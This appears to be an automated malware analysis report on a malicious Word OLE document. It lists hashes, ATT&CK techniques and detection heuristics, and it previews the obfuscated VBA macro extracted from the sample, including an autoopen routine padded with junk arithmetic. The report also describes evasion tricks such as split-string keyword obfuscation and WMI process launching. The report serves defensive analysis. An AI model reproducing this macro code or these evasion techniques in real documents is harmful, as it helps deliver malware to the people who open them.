Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7836eca87915833b…

MALICIOUS

Office (OLE)

180.1 KB Created: 2019-04-23 06:36:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: bb67e1aad0c170dddf21d8618db2c944 SHA-1: 0d1839fef39243edacd92b629fd554f9c1ab453b SHA-256: 7836eca87915833bc896f259106067f5b2b683c748259cccdd862d0bc4677dfd
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1137.001 Office Application Startup: Office Application

The sample contains a VBA macro with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes GetObject and CreateObject to instantiate the Win32_Process class, indicating an intent to launch processes. This is further supported by the critical heuristic firing for VBA WMI Win32_Process launcher and obfuscation of the Win32_Process keyword. The macro's obfuscated nature and the presence of auto-execution markers suggest it is designed to download and execute a secondary payload.

Heuristics 9

  • ClamAV: Doc.Malware.Sagent-6953854-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6953854-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 49501 bytes
SHA-256: a9b6417881fe4ebf15164fa566fe2c3a34fadf0d4cf324ba3fb0186bf6afa78b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "WBAX4Q"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TkQDAX"
Attribute VB_Base = "0{923EF9BA-C5A5-4A28-9FCC-341840A52C4B}{E325704E-9898-4AD2-A694-307277347182}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "M4QAUGAA"
Attribute VB_Base = "0{010F02D7-82B8-4A7D-8963-5A0CAB71E9EE}{E3D5D4FF-F55F-474F-B32E-001F9DF92F3B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "jDkXZD"
Sub autoopen()
   If UGGABUUc = qcAACwA Then
     woBBDcA = b_DAA_Q - zGDAABA
       ElseIf a_QkZcU = rk1AAAxA Then
      Select Case KDCBAAA
         Case 665953356
       zUQAQU = 295452934 * zkCC_AA / 272875986 * Hex(645923673 * Fix(lZADUU / CStr(f_G1AQAk) * qQAXx4A - Fix(262456776)) - 111596868 * Round(zDXAX_A + Hex(RkBUwCA) / 810320931 - 612533359))
       p4UAwQQ = CA1D14D + G14GCwU * zA1QAA / Sqr(VGDUACCA) / 340297304 - Hex(okABAAZo) + (850598483 / 125331810)
      End Select
End If
   If MBXAZDAA = TCQUBBX Then
     EBA_XUAk = JCx4AUUA - QZACAD
       ElseIf ZkXoAZcA = zQXwAA_ Then
      Select Case RDUXZQB
         Case 678427463
       FQBoQAD_ = 288055116 * fAZxAGA / 82402907 * Hex(176598690 * Fix(LcXUQAU / CStr(qAADBA) * ic4XGoA - Fix(912236363)) - 193361679 * Round(FC4UAA + Hex(kBoAQXCG) / 188354176 - 719185047))
       IQAZXD = E_A4AZx + B1AQ1X * bBxUwQXQ / Sqr(QGDXAD) / 752768292 - Hex(BAUAAA) + (437726443 / 153289810)
      End Select
End If
   If VwGAAw = R1oAAwo Then
     AkAAUU = uAAAAQC - px_XD1GD
       ElseIf sCxwAA = FCwxAQG Then
      Select Case BkXAA1G
         Case 414603953
       vAAGAA = 242799538 * tQxDAAB / 497382290 * Hex(538953488 * Fix(zZUAAA / CStr(zAAAAXc) * NQcBwA - Fix(497915745)) - 941560784 * Round(zGAAkA + Hex(UwcxAo) / 828388635 - 343693970))
       lDoAZBw = fUDwoAww + rwXwk4D1 * EAoACwA / Sqr(JZBUBDDA) / 994423747 - Hex(wGD_AAQ) + (860725268 / 777915815)
      End Select
End If
NAAcXAQ
   If DZ_GQQ = UAAU11A Then
     MAAABDB = KxUQDB - G4UAGXD
       ElseIf VcCx1DBA = kAwAAQA Then
      Select Case B4CABo
         Case 158760453
       T4oQ1DCo = 964998818 * zAUBCBDo / 470827955 * Hex(91131088 * Fix(qwCA_UD / CStr(TBGCAC) * KAAc_X - Fix(209499863)) - 892944093 * Round(AQAwAk + Hex(cAC_Ao) / 148092138 - 765974476))
       C4XABA = WUDxAAD + doAGQQ * WwA4CBG / Sqr(sQkDcQCB) / 684067665 - Hex(b4GUAQBA) + (432265612 / 592400982)
      End Select
End If
   If pAXAAw = jcAUZZkU Then
     zXB4Ak = EDAkZD - LwUBQxAD
       ElseIf EkGACDC = sQX1ABkk Then
      Select Case aZAUB1A
         Case 317346123
       zAZZ1xU = 537491267 * SXQ4_UA / 918842211 * Hex(324874682 * Fix(tkA4cAAk / CStr(nwZAAx) * BBBA4D - Fix(322000556)) - 958078217 * Round(JAccAQAC + Hex(PwcA1U4C) / 41056031 - 808104519))
       TA1AkAZ = BABAZx + kABXQUAo * K_DABwBo / Sqr(zGAA1A1A) / 153096890 - Hex(UBAADAA4) + (204781534 / 461767969)
      End Select
End If
End Sub

Attribute VB_Name = "bkZQAZB"
Function NAAcXAQ()
On Error Resume Next
   If CUUAAAQ = mxAcA1DD Then
     zoUADA = LABCDA - iQDAA_
       ElseIf GZC1UAQc = NQADAZAX Then
      Select Case rAAABxA
         Case 604543125
       u_GQABcA = 399598486 * sAUAoA1 / 141653988 * Hex(859298786 * Fix(wADA4k / CStr(OCcxAAoB) * cAQwAc - Fix(881020137)) - 527567190 * Round(FA_kAAQo + Hex(wBQAAUB) / 895796011 - 575972943))
       SBDAXDUQ = DCxBC_o + OxoBDU * IAAcCA / Sqr(YDAUUADB) / 148585570 - Hex(ZAkAcQZB) + (980923143 / 473941068)
      End Select
End If
   If oAAZAAAG = axABZ4w Then
     AD4UQAow = jGkkQAx - cQAkA4BA
       Els
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.